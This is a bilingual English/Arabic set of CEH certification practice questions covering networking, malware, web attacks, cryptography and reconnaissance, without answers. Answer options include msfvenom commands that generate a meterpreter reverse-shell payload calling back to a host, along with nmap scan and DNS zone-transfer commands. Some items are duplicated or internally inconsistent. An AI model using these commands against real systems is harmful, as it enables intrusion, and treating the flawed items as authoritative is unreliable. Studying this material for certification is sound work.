CEH Questions Part (3)
While using your bank’s online servicing you notice the following string in the URL bar: “http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21 ” You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes.
Which type of vulnerability is present on this site?
أثناء إستخدام خدمة البنك عبر الإنترنت، تلاحظ السلسلة التالية في شريط URL:
"http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21 " تلاحظ أنه إذا قمت بتعديل قيم Damount & Camount
وأرسلت الطلب، تلك البيانات على صفحة الويب تعكس التغييرات. ما هو نوع الضعف الموجود في هذا الموقع؟
A. Cookie Tampering
B. SQL Injection
C. Web Parameter Tampering
D. XSS Reflection
The establishment of a TCP connection involves a negotiation called three-way handshake.
What type of message does the client send to the server in order to begin this negotiation?
يعتمد إنشاء وصلة TCP على مفاوضات تسمى المصافحة الثلاثية. ما نوع الرسالة التي يرسلها العميل إلى الخادم لبدء هذه المفاوضات؟
A. ACK
B. SYN
C. RST
D. SYN-ACK
Which type of security feature stops vehicles from crashing through the doors of a building?
ما نوع ميزة الأمان التي تمنع المركبات من الاصطدام بأبواب المبنى؟
A. Bollards
B. Receptionist
C. Mantrap
D. Turnstile
The company ABC recently contracts a new accountant. The accountant will be working with the financial statements. Those financial statements need to be approved by the CFO and then they will be sent to the accountant but the CFO is worried because he wants to be sure that the information sent to the accountant was not modified once he approved it.
Which of the following options can be useful to ensure the integrity of the data?
Which of the following options can be useful to ensure the integrity of the data?
تعاقدت شركة إيه بي سي مؤخرا مع محاسب جديد. وسيعمل المحاسب مع البيانات المالية. يجب أن تتم الموافقة على تلك البيانات المالية من قبل المدير المالي، وبعد ذلك يتم إرسالها إلى المحاسب، ولكن المدير المالي يشعر بالقلق لأنه يريد التأكد من أن المعلومات التي تم إرسالها إلى المحاسب لم يتم تعديلها بمجرد موافقته عليها.
ما هي الخيارات التالية التي يمكن أن تكون مفيدة لضمان سلامة البيانات؟
A. The CFO can use a hash algorithm in the document once he approved the financial statements
B. The CFO can use an excel file with a password
C. The financial statements can be sent twice, one by email and the other delivered in USB and the accountant can compare both to be sure is the same document
D. The document can be sent to the accountant using an exclusive USB for that document
What is the purpose of a demilitarized zone on a network?
ما هو الغرض من إنشاء منطقة منزوعة السلاح على شبكة؟
A. To scan all traffic coming through the DMZ to the internal network
B. To only provide direct access to the nodes within the DMZ and protect the network behind it
C. To provide a place to put the honeypot
D. To contain the network devices you wish to protect
Which of the following Linux commands will resolve a domain name into IP address?
أي من أوامر Linux التالية سوف يحول اسم المجال إلى عنوان IP؟
A. >host-t a hackeddomain.com
B. >host-t ns hackeddomain.com
C. >host -t soa hackeddomain.com
D. >host -t AXFR hackeddomain.com
Shellshock allowed an unauthorized user to gain access to a server. It affected many Internetfacing services, which OS did it not directly affect?
سمح Shellshock لمستخدم غير مصرح له بالوصول إلى الخادم. لقد أثرت على العديد من خدمات مواجهة الإنترنت ، فما نظام التشغيل الذي لم يؤثر بشكل مباشر؟
A. Linux
B. Unix
C. OS X
D. Windows
Which regulation defines security and privacy controls for Federal information systems and organizations?
ما هي اللوائح التي تحدد ضوابط الأمان والخصوصية لأنظمة المعلومات والمؤسسات الفيدرالية؟
A. HIPAA
B. EU Safe Harbor
C. PCI-DSS
D. NIST-800-53
What is a “Collision attack” in cryptography?
ما هو "هجوم التصادم" في التشفير؟
A. Collision attacks try to get the public key
B. Collision attacks try to break the hash into three parts to get the plaintext value
C. Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key
D. Collision attacks try to find two inputs producing the same hash
Which of the following tools can be used for passive OS fingerprinting?
ما هي الأدوات التالية التي يمكن إستخدامها لجمع معلومات نظام التشغيل السلبية؟
A. nmap
B. tcpdump
C. tracert
D. ping
Which of the following describes the characteristics of a Boot Sector Virus?
أي مما يلي يصف خصائص فيروس قطاع التشغيل؟
A. Modifies directory table entries so that directory entries point to the virus code instead of the actual program.
B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR.
C. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.
D. Overwrites the original MBR and only executes the new virus code.
Your company was hired by a small healthcare provider to perform a technical assessment on the network.
What is the best approach for discovering vulnerabilities on a Windows-based computer?
تم تعيين شركتك من قبل مقدم رعاية صحية صغير لإجراء تقييم تقني على الشبكة.
ما هو أفضل نهج لاكتشاف الثغرات الأمنية على جهاز كمبيوتر يعمل بنظام Windows؟
A. Use the built-in Windows Update tool
B. Use a scan tool like Nessus
C. Check MITRE.org for the latest list of CVE findings
D. Create a disk image of a clean Windows installation
Which of the following is a command line packet analyzer similar to GUI-based Wireshark?
أي مما يلي عبارة عن محلل حزم سطر أوامر مشابه لـ Wireshark المستند إلى واجهة المستخدم الرسومية؟
A. nessus
B. tcpdump
C. ethereal
D. Jack the ripper
DHCP snooping is a great solution to prevent rogue DHCP servers on your network. Which security feature on switchers leverages the DHCP snooping database to help prevent man-in-themiddle attacks?
إستطلاع DHCP هو حل رائع لمنع ملقمات DHCP المخادعة على شبكتك.
ما هي ميزة الأمان الموجودة على المحولات التي تستفيد من قاعدة بيانات إستطلاع DHCP للمساعدة في منع الهجمات التي يتعرض لها "المتطوعون"؟
A. Spanning tree
B. Dynamic ARP Inspection (DAI)
C. Port security
D. Layer 2 Attack Prevention Protocol (LAPP)
Bob, a network administrator at BigUniversity, realized that some students are connecting their notebooks in the wired network to have Internet access. In the university campus, there are many Ethernet ports available for professors and authorized visitors but not for students. He identified this when the IDS alerted for
malware activities in the network.
What should Bob do to avoid this problem?
بوب، مسؤول شبكة في جامعة بيغ، أدرك أن بعض الطلاب يقومون بتوصيل حواسيبهم المحمولة في الشبكة السلكية للحصول على إمكانية الوصول إلى الإنترنت. وفي حرم الجامعة، هناك العديد من منافذ شبكة إيثرنت المتاحة للأساتذة والزوار المعتمدين ولكن ليس للطلاب. وقد تعرف على ذلك عندما تنبه IDS لأنشطة البرامج الضارة في الشبكة.
ماذا يجب ان يفعل بوب ليتجنب هذه المشكلة؟
A. Disable unused ports in the switches
B. Separate students in a different VLAN
C. Use the 802.1x protocol
D. Ask students to use the wireless network
A company’s policy requires employees to perform file transfers using protocols which encrypt traffic. You suspect some employees are still performing file transfers using unencrypted protocols because the employees do not like changes. You have positioned a network sniffer to capture traffic from the laptops used by employees in the data ingest department. Using Wireshark to examine the captured traffic, which command can be used as a display filter to find unencrypted file transfers?
تتطلب سياسة الشركة من الموظفين إجراء عمليات نقل الملفات باستخدام بروتوكولات تشفير حركة المرور. أنت تشك في أن بعض الموظفين ما زالوا يقومون بعمليات نقل الملفات باستخدام بروتوكولات غير مشفرة لأن الموظفين لا يحبون التغييرات. لقد قمت بتعيين مراقب شبكة لالتقاط حركة المرور من أجهزة الكمبيوتر المحمولة التي يستخدمها الموظفون في قسم جمع البيانات. إستخدام Wireshark لفحص حركة المرور الملتقطة، أي أمر يمكن إستخدامه كعامل تصفية عرض للبحث عن عمليات نقل الملفات غير المشفرة؟
A. tcp.port = = 21
B. tcp.port = 23
C. tcp.port = = 21 | | tcp.port = = 22
D. tcp.port ! = 21
You just set up a security system in your network. In what kind of system would you find the following string of characters used as a rule within its configuration? Alert tcp any any -> 192.168.100.0/24 21 (msg: ““FTP on the network!””;)
لقد قمت للتو بإعداد نظام أمان في شبكتك. في أي نوع من النظام ستجد سلسلة الأحرف التالية المستخدمة كقاعدة ضمن التكوين الخاص به؟ تنبيه tcp أي -> 192.168.100.0/24 21 (رسالة: “FTP على الشبكة!” ؛)
A. A firewall IPTable
B. FTP Server rule
C. A Router IPTable
D. An Intrusion Detection System
Which of the following program infects the system boot sector and the executable files at the same time?
أي من البرامج التالية يصيب قطاع تمهيد النظام والملفات القابلة للتنفيذ في نفس الوقت؟
A. Polymorphic virus
B. Stealth virus
C. Multipartite Virus
D. Macro virus
To determine if a software program properly handles a wide range of invalid input, a form of automated testing can be used to randomly generate invalid input in an attempt to crash the program.
What term is commonly used when referring to this type of testing?
لتحديد ما إذا كان برنامج ما يعالج بشكل صحيح مجموعة كبيرة من المدخلات غير الصحيحة، يمكن إستخدام شكل من الاختبارات الآلية لتوليد مدخلات غير صحيحة بشكل عشوائي في محاولة لوقف البرنامج.
ما هو المصطلح الشائع إستخدامه عند الإشارة إلى هذا النوع من الاختبارات؟
A. Randomizing
B. Bounding
C. Mutating
D. Fuzzing
An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the network’s external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file.
What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive?
قام نظام الكشف عن الاختراقات IDS بتنبيه مسؤول الشبكة الي تسلسل محتمل من الحزم المرسلة الي خادم ويب في DMZ الخارجي للشبكة. تم التقاط حركة مرور الحزمه بواسطة IDS وحفظها في PCAP.
ما نوع أداة الشبكة التي يمكن إستخدامها لتحديد ما إذا كانت هذه الحزم ضارة حقا أم إيجابية ؟
A. Protocol analyzer
B. Network sniffer
C. Intrusion Prevention System (IPS)
D. Vulnerability scanner
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.
What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?
تم اكتشاف خطأ Heartbleed في عام 2014 ويشار إليه على نطاق واسع ضمن نقاط الضعف والتعرض الشائعة لـ MITRE (CVE) باسم CVE-2014-0160. يؤثر هذا الخطأ على تنفيذ OpenSSL لبروتوكولات أمان طبقة النقل (TLS) المحددة في RFC6520.
ما نوع المفتاح الذي يتركه هذا الخطأ مكشوفًا للإنترنت مما يجعل استغلال أي نظام مخترق أمرًا سهلاً للغاية؟
ما نوع المفتاح الذي يتركه هذا الخطأ مكشوفًا للإنترنت مما يجعل استغلال أي نظام مخترق أمرًا سهلاً للغاية؟
A. Public
B. Private
C. Shared
D. Root
Why should the security analyst disable/remove unnecessary ISAPI filters?
لماذا يجب على محلل الأمان تعطيل/إزالة عوامل تصفية ISAPI غير الضرورية؟
A. To defend against social engineering attacks
B. To defend against webserver attacks
C. To defend against jailbreaking
D. To defend against wireless attacks
Which of the following is a component of a risk assessment?
ما هو أحد العناصر التالية في تقييم المخاطر؟
A. Administrative safeguards
B. Physical security
C. DMZ
D. Logical interface
CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this:
From: [email protected]
To: [email protected]
Subject: Test message
Date: 4/3/2017 14:37
The employee of CompanyXYZ receives your email message. This proves that CompanyXYZ’s email gateway doesn’t prevent what?
From: [email protected]
To: [email protected]
Subject: Test message
Date: 4/3/2017 14:37
The employee of CompanyXYZ receives your email message. This proves that CompanyXYZ’s email gateway doesn’t prevent what?
طلبت شركة CompanyXYZ منك تقييم أمان بوابة البريد الإلكتروني المحيط بها. من مكتبك في نيويورك ، تقوم بصياغة رسالة بريد إلكتروني منسقة بشكل خاص وإرسالها عبر الإنترنت إلى أحد موظفي CompanyXYZ. إن موظف CompanyXYZ على علم باختبارك. تبدو رسالة البريد الإلكتروني الخاصة بك كما يلي:
إلى: [email protected]
الموضوع: رسالة تجريبية
التاريخ: 4/3/2017 14:37
يتلقى موظف CompanyXYZ رسالة البريد الإلكتروني الخاصة بك. هذا يثبت أن بوابة البريد الإلكتروني لشركة CompanyXYZ لا تمنع ماذا؟
A. Email Masquerading
B. Email Harvesting
C. Email Phishing
D. Email Spoofing
Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations.
Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA. In this context, what can you say?
Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA. In this context, what can you say?
استنتج بوب، وهو مسؤول النظام في TPNQM SA، ذات يوم أنه لا توجد حاجة إلى DMZ إذا قام بتهيئة جدار الحماية بشكل صحيح للسماح بالوصول فقط إلى الخوادم/المنافذ، والتي يمكن أن يكون لها وصول مباشر إلى الإنترنت، ومنع الوصول إلى محطات العمل. كما استنتج بوب أن DMZ تصبح منطقية فقط عندما يتوفر جدار حماية على قدر من الاستبانة، وهو ما لا ينطبق على DMZ من TPNQM SA. وفي هذا السياق، ماذا يمكنكم ان تقولوا؟
A. Bob can be right since DMZ does not make sense when combined with stateless firewalls
B. Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one
C. Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations
D. Bob is partially right. DMZ does not make sense when a stateless firewall is available
Which of the following commands checks for valid users on an SMTP server?
أي من الأوامر التالية يتحقق من وجود مستخدمين صالحين على خادم SMTP؟
A. RCPT
B. CHK
C. VRFY
D. EXPN
Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API.
Which of the following tools is used by Wilson in the above scenario?
يستهدف ويلسون ، وهو مخترق محترف ، مؤسسة لتحقيق منفعة مالية ويخطط لتعريض أنظمتها للخطر عن طريق إرسال رسائل بريد إلكتروني ضارة. لهذا الغرض ، يستخدم أداة لتتبع رسائل البريد الإلكتروني للهدف واستخراج المعلومات مثل هويات المرسل وخوادم البريد وعناوين IP للمرسل ومواقع المرسلين من مصادر عامة مختلفة. كما يتحقق أيضًا مما إذا كان عنوان البريد الإلكتروني قد تم تسريبه باستخدام haveibeenpwned.com API.
أي من الأدوات التالية يستخدمها ويلسون في السيناريو أعلاه؟
A. Factiva
B. ZoomInfo
C. Netcraft
D. Infoga
Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it.
Which of the following tools did Bob employ to gather the above information?
Which of the following tools did Bob employ to gather the above information?
تمكن بوب ، أحد المهاجمين ، من الوصول إلى جهاز إنترنت الأشياء المستهدف. استخدم أداة عبر الإنترنت لجمع المعلومات المتعلقة بطراز جهاز إنترنت الأشياء والشهادات الممنوحة له.
أي من الأدوات التالية استخدمها بوب لجمع المعلومات الواردة أعلاه؟
A. FCC ID search
B. Google image search
C. search.com
D. EarthExplorer
A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine.
Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s web domain?
Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s web domain?
يقوم مُختبِر الاختراق بتنفيذ عملية جمع معلومات ويقوم بمراجعة المعلومات المتاحة للجمهور حول مؤسسة ما باستخدام محرك بحث Google.
أي من عوامل التشغيل المتقدمة التالية سيسمح لمختبر القلم بتقييد البحث على نطاق الويب الخاص بالمؤسسة؟
A. [allinurl:]
B. [location:]
C. [site:]
D. [link:]
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.
What is the component of the Docker architecture used by Annie in the above scenario?
What is the component of the Docker architecture used by Annie in the above scenario?
تستخدم آني ، وهي مهندسة أمان سحابية ، هيكلDocker لتوظيف نموذج عميل / خادم في التطبيق الذي تعمل عليه. إنها تستخدم مكونًا يمكنه معالجة طلبات واجهة برمجة التطبيقات (API) والتعامل مع كائنات Docker المختلفة ، مثل الحاويات ، والأحجام ، والصور ، والشبكات.
ما هو مكون هيكل Docker الذي استخدمته Annie في السيناريو أعلاه؟
A. Docker objects
B. Docker daemon
C. Docker client
D. Docker registries
You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two employees’ emails from some public sources and are creating a clientside backdoor to send it to the employees via email.
Which stage of the cyber chain are you at?
أنت مختبر إختراق يعمل على إختبار وعي المستخدم بالعاملين في XYZ العميل. لقد حصلت على رسائل البريد الإلكتروني الخاصة بموظفين إثنين من بعض المصادر العامة وتقوم بإنشاء باب خلفي جانبي للعميل لإرساله إلى الموظفين عبر البريد الإلكتروني.
في أي مرحلة من السلسلة السيبرانية أنت؟
A. Reconnaissance
B. Weaponization
C. Command and control
D. Exploitation
Sam is working as a system administrator in an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize the organization’s vulnerability management processes. The base score that Sam obtained after performing CVSS rating was 4.0.
What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?
What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?
يعمل سام كمسؤول نظام في مؤسسة. لقد استوعب الخصائص الرئيسية للثغرة وأنتج درجة رقمية ليعكس مدى خطورتها باستخدام CVSS v3.0 لتقييم عمليات إدارة الثغرات الأمنية وتحديد أولوياتها بشكل صحيح. كانت النتيجة الأساسية التي حصل عليها Sam بعد أداء تصنيف CVSS هي 4.0.
ما هو مستوى خطورة CVSS للثغرة الأمنية التي اكتشفها Sam في السيناريو أعلاه؟
A. Critical
B. Medium
C. High
D. Low
John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP.
What should John do to communicate correctly using this type of encryption?
What should John do to communicate correctly using this type of encryption?
يريد جون إرسال بريد إلكتروني إلى ماري يتضمن معلومات حساسة ، ولا يثق في الشبكة التي يتصل بها. أعطته ماري فكرة استخدام PGP.
ما الذي يجب أن يفعله جون للتواصل بشكل صحيح باستخدام هذا النوع من التشفير؟
A. Use his own private key to encrypt the message.
B. Use his own public key to encrypt the message.
C. Use Marie’s private key to encrypt the message.
D. Use Marie’s public key to encrypt the message.
The network users are complaining because their systems are slowing down. Further, every time they attempt to go to a website, they receive a series of pop-ups with advertisements.
What type of malware have the systems been infected with?
What type of malware have the systems been infected with?
يشتكي مستخدمو الشبكة لأن أنظمتهم تتباطأ. علاوة على ذلك ، في كل مرة يحاولون فيها الانتقال إلى موقع ويب ، يتلقون سلسلة من النوافذ المنبثقة مع الإعلانات.
ما نوع البرامج الضارة التي أصيبت الأنظمة بها؟
A. Trojan
B. Spyware
C. Virus
D. Adware
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access or modify data attached to a web application.
Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an attacker?
Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an attacker?
تحاول هجمات حقن (SQLi) إدخال بناء جملة SQL في طلبات الويب ، والتي قد تتجاوز المصادقة وتسمح للمهاجمين بالوصول أو تعديل البيانات المرفقة بتطبيق ويب.
أي من أنواع SQLi التالية يستفيد من قدرة خادم قاعدة البيانات على تقديم طلبات DNS لتمرير البيانات إلى المهاجم؟
A. In-band SQLi
B. Union-based SQLi
C. Out-of-band SQLi
D. Time-based blind SQLi
Which type of virus can change its own code and then cipher itself multiple times as it replicates?
أي نوع من الفيروسات يمكنه تغيير الكود الخاص به ثم تشفير نفسه عدة مرات أثناء تكراره؟
A. Stealth virus
B. Tunneling virus
C. Cavity virus
D. Encryption virus
What is the port to block first in case you are suspicious that an IoT device has been compromised?
ما هو المنفذ الذي يجب حظره أولاً في حالة الشك في تعرض جهاز إنترنت الأشياء للاختراق؟
A. 22
B. 48101
C. 80
D. 443
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
ما هي الطريقة الصحيحة لاستخدام MSFvenom لإنشاء كود TCP عكسي لنظام Windows؟
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information.
Which of the following attacks can be performed by exploiting the above vulnerability?
Which of the following attacks can be performed by exploiting the above vulnerability?
يقوم صموئيل ، مسئول الأمن ، بتقييم تكوين خادم الويب. لقد لاحظ أن الخادم يسمح باتصالات SSLv2 ، ويتم استخدام نفس شهادة المفتاح الخاص على خادم مختلف يسمح باتصالات SSLv2. تجعل هذه الثغرة الأمنية خادم الويب عرضة للهجمات حيث يمكن لخادم SSLv2 تسريب معلومات أساسية.
أي من الهجمات التالية يمكن تنفيذها من خلال استغلال الثغرة الأمنية المذكورة أعلاه؟
A. Padding oracle attack
B. DROWN attack
C. DUHK attack
D. Side-channel attack
Techno Security Inc. Recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network.
Which of the following Nmap commands must John use to perform the TCP SYN ping scan?
Which of the following Nmap commands must John use to perform the TCP SYN ping scan?
عينت شركة Techno Security Inc. مؤخرًا جون كمختبر اختراق. تم تكليفه بتحديد المنافذ المفتوحة في الشبكة المستهدفة وتحديد ما إذا كانت المنافذ متصلة بالإنترنت وأي مجموعات قواعد جدار حماية تمت مواجهتها. قرر جون إجراء فحص TCP SYN ping على الشبكة المستهدفة.
أي من أوامر Nmap التالية يجب أن يستخدمها John لإجراء فحص TCP SYN ping؟
A. nmap -sn -PO < target IP address >
B. nmap -sn -PS < target IP address >
C. nmap -sn -PA < target IP address >
D. nmap -sn -PP < target IP address >
Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?
استهدف مخترق محترف أليس خدمات السحابة الإلكترونية لمؤسسة ما. لقد تسللت إلى مزود MSP الهدف عن طريق إرسال رسائل بريد إلكتروني للتصيد الاحتيالي وتوزيع برامج ضارة مخصصة لخرق حسابات المستخدمين والحصول على وصول عن بُعد إلى الخدمة السحابية. علاوة على ذلك ، قامت بالوصول إلى ملفات تعريف العملاء المستهدفة باستخدام حساب MSP الخاص بها ، وضغطت بيانات العميل ، وخزنتها في MSP. ثم استخدمت هذه المعلومات لشن مزيد من الهجمات على المنظمة المستهدفة.
أي من هجمات السحابة التالية نفذتها أليس في السيناريو أعلاه؟
A. Cloud cryptojacking
B. Man-in-the-cloud (MITC) attack
C. Cloud hopper attack
D. Cloudborne attack
John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization.
What is the tool employed by John to gather information from the LDAP service?
What is the tool employed by John to gather information from the LDAP service?
استهدف John ، وهو مخترق محترف ، مؤسسة تستخدم LDAP للوصول إلى خدمات الدليل الموزعة. استخدم أداة آلية للاستعلام بشكل مجهول عن خدمة LDAP للحصول على معلومات حساسة مثل أسماء المستخدمين والعناوين وتفاصيل الأقسام وأسماء الخوادم لشن مزيد من الهجمات على المؤسسة المستهدفة.
ما هي الأداة التي يستخدمها جون لجمع المعلومات من خدمة LDAP؟
A. ike-scan
B. Zabasearch
C. JXplorer
D. EarthExplorer
Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network.
What type of footprinting technique is employed by Richard?
ريتشارد ، مهاجم ، يستهدف MNC. في هذه العملية ، يستخدم تقنية جمع المعلومات لجمع أكبر قدر ممكن من المعلومات. باستخدام هذه التقنية ، يقوم بجمع معلومات المجال مثل اسم المجال الهدف وتفاصيل الاتصال بمالكه وتاريخ انتهاء الصلاحية وتاريخ الإنشاء. باستخدام هذه المعلومات ، يقوم بإنشاء خريطة لشبكة المؤسسة ويضلل مالكي النطاق بالهندسة الاجتماعية للحصول على التفاصيل الداخلية لشبكتها.
ما نوع تقنية جمع المعلومات التي يستخدمها ريتشارد؟
A. VoIP footprinting
B. Email footprinting
C. Whois footprinting
D. VPN footprinting
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson’s machine.
What is the social engineering technique Steve employed in the above scenario?
أجرى جونسون ، أحد المهاجمين ، بحثًا عبر الإنترنت للحصول على تفاصيل الاتصال بشركات الأمن السيبراني المشهورة. وجد رقم الاتصال الخاص بـ sibertech.org واتصل بالرقم ، مدعيًا أنه يمثل فريق دعم فني من أحد البائعين. وحذر من أن خادمًا معينًا على وشك الاختراق وطلب من sibertech.org اتباع التعليمات المقدمة. وبالتالي ، دفع الضحية إلى تنفيذ أوامر غير معتادة وتثبيت ملفات ضارة ، والتي تم استخدامها بعد ذلك لجمع المعلومات المهمة ونقلها إلى جهاز Johnson.
ما هي تقنية الهندسة الاجتماعية التي استخدمها ستيف في السيناريو أعلاه؟
A. Diversion theft
B. Quid pro quo
C. Elicitation
D. Phishing
In an attempt to increase the security of your network, you implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know it. How do you accomplish this?
في محاولة لزيادة أمان شبكتك ، تقوم بتنفيذ حل من شأنه أن يساعد في إبقاء شبكتك اللاسلكية غير قابلة للاكتشاف ويمكن الوصول إليها فقط لمن يعرفها. كيف يمكن تحقيق ذلك؟
A. Delete the wireless network
B. Lock all users
C. Disable SSID broadcasting
D. Remove all passwords
Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network without a password. However, Jane has a long, complex password on her router.
What attack has likely occurred?
تدعو جين صديقيها أليس وجون إلى حفلة LAN. تصل أليس وجون إلى شبكة جين اللاسلكية دون كلمة مرور. ولكن جين لديها كلمة مرور طويلة ومعقدة على جهاز التوجيه.
أي هجوم وقع على الارجح؟
A. Wardriving
B. Wireless sniffing
C. Evil twin
D. Piggybacking
To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time.
Which technique is discussed here?
Which technique is discussed here?
لإنشاء شبكة الروبوتات ، يمكن للمهاجم استخدام العديد من الأساليب لفحص الأجهزة المعرضة للخطر. يجمع المهاجم أولاً معلومات حول عدد كبير من الأجهزة المعرضة للخطر لإنشاء قائمة. بعد ذلك ، يصيبون الآلات. يتم تقسيم القائمة من خلال تخصيص نصف القائمة للأجهزة المخترقة حديثًا. يتم تشغيل عملية المسح في وقت واحد. تضمن هذه التقنية انتشار التعليمات البرمجية الضارة وتثبيتها في وقت قصير.
ما هي التقنية التي تمت مناقشتها هنا؟
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique.
D. Topological scanning technique
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced.
Which of the following techniques is described in the above scenario?
Which of the following techniques is described in the above scenario?
استخدم لويس ، أحد المتسللين المحترفين ، أدوات متخصصة أو محركات بحث لتشفير جميع أنشطة التصفح الخاصة به والتنقل دون الكشف عن هويته للحصول على معلومات مخفية حساسة حول قواعد البيانات الحكومية أو الفيدرالية الرسمية. بعد جمع المعلومات ، نفذ بنجاح هجومًا على المنظمة الحكومية المستهدفة دون أن يتم تعقبه.
أي من الأساليب التالية موصوفة في السيناريو أعلاه؟
A. Website footprinting
B. Dark web footprinting
C. VPN footprinting
D. VoIP footprinting
An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests.
What is the type of vulnerability assessment solution that James employed in the above scenario?
What is the type of vulnerability assessment solution that James employed in the above scenario?
تقوم إحدى المؤسسات بإجراء تقييم للثغرات الأمنية للتخفيف من حدة التهديدات. أجرى جيمس ، أحد مختبري الاختراق، مسحًا ضوئيًا للمؤسسة من خلال إنشاء فحص للبروتوكولات الموجودة على أجهزة المؤسسة لاكتشاف المنافذ المرفقة بخدمات مثل خادم البريد الإلكتروني أو خادم الويب أو خادم قاعدة البيانات. بعد تحديد الخدمات ، اختار الثغرات الأمنية على كل جهاز وبدأ في تنفيذ الاختبارات ذات الصلة فقط.
ما هو نوع حل تقييم الضعف الذي استخدمه جيمس في السيناريو أعلاه؟
A. Service-based solutions
B. Product-based solutions
C. Tree-based assessment
D. Inference-based assessment
Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message and how is Poly validating it?
يرسل دوريان بريدًا إلكترونيًا موقعًا رقميًا إلى بولي. بأي مفتاح يوقع دوريان على هذه الرسالة وكيف يتحقق بولي من صحتها؟
A. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s private key.
B. Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
C. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
D. Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
